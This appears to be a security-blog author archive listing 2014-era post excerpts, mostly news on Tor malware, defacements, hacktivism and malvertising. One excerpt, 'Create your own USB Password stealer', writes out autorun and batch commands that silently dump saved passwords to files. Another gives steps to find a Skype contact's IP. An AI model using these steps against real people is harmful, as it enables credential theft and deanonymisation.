Browsing author

root

How to find the IP of a Skype user

1.Log onto the computer as the “Administrator.” Go to “Start” > “Search.” 2.Enter “cmd” into the “Search” box. Press “Enter.” 3.Go to “Start” > “Programs” > “Skype.” 4.Click “Contacts” and then click on the name of a contact on the menu. 5.Click “Call” and wait until the other person answers. If he does not answer, […]

How do open source tools stay secure?

Security of open source code is a hot topic, what with Heartbleed, Shellshock, and Poodle making the news. Open source code is now widely used everywhere, from big enterprises to small businesses. This recorded webinar discusses how to keep open source tools secure,

Tor users targeted with exit node malware

An exit node on the Tor network has been discovered to be slipping malware on top of downloads, according to The Register. The server, based in Russia, has been flagged as bad by The Tor Project, but this “would not prevent copycat attackers from the more than 100 exit nodes in operation.”

Iranian Hacker Defaces Website of UAE’s Telecom Regulatory Authority

An Iranian hacker going with the handle of MoHaMaD VaKeR hacked and defaced the official sub-domain ofTelecommunications Regulatory Authority (TRA) of United Arab Emirates (UAE), two days ago on 25th Oct 2014. The targeted sub-domain reportedly belongs to IPV6 training forum. Hacker left a deface page along with a message on hacked domain, bashing the site admin […]

Flashlight Apps Stealing Personal Information Stored On Your Smartphone

It is our duty to protect our data— but are we ready? No one would have thought that the most practical invention of the past decade will be the Smartphone. It is a reality that we cannot live without these devices at all. Smartphones have become a mandatory part of our life since with few […]

Anonymous Shuts Down Top Israeli Govt Sites Against Killing Of 14-Yr-Old Kid

The online hacktivist Anonymous is back with yet another cyber attack. This time the group has taken down 43 top Israeli government websites against shooting and killing of a 14-year-old U.S. citizen Orwah Hammad by Israeli Defence Forces. Anonymous conducted the cyber attack under the banner of #OpOrwahHammad in which websites belonging to Israeli government such as […]

Create your own USB Password stealer

This tutorial will walk you through setting up a USB flash drive to steal the saved passwords on a computer. Method 1 open notepad/wordpad ————————————— type:[autorun] open=launch.bat ACTION= Perform a Virus Scan ————————————— save this as AUTORUN.inf open a new notepad/wordpad document type:start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start […]

Top 5 Scariest Zombie Botnets

An army of the undead, wreaking havoc on the Internet – it’s a nightmare scenario that has played out many times as the population of humans online has exploded. Some zombie plagues have been particularly troubling, and we will take a look at the worst of the worst.

Top Five Best But Lesser Known Features of Android 5.0 Lollipop

As I’ve written in my earlier posts, Android 5.0 Lollipop is the most significant change in Android line-up since 2011’s Android Ice Cream Sandwich. Lollipop aims at making material design a more prominent feature in looks and feels of the Android OS. Apart from the popular and known features of Android’s new OS, there are […]

Yahoo, Match and AOL hit by ransomware

Cybercriminals taking advantage of a ‘malvertising’ attack on big name sites including Yahoo!, Match.com and AOL were making in the region of $25,000 per day, according to Forbes.

The Evolution of Webinject

Last month, we presented “The Evolution of Webinject” in Seattle at the 24th Virus Bulletin conference. This blog post will go over its key findings and provide links to the various material that has been released in the last few weeks.

Windows 10 to tighten security with prominent 2FA

Microsoft is taking aim at traditional single password systems with the upcoming version of Windows, by including build in two-factor authentication according to ZDNet, which describes the move as “audacious plans to tighten security”.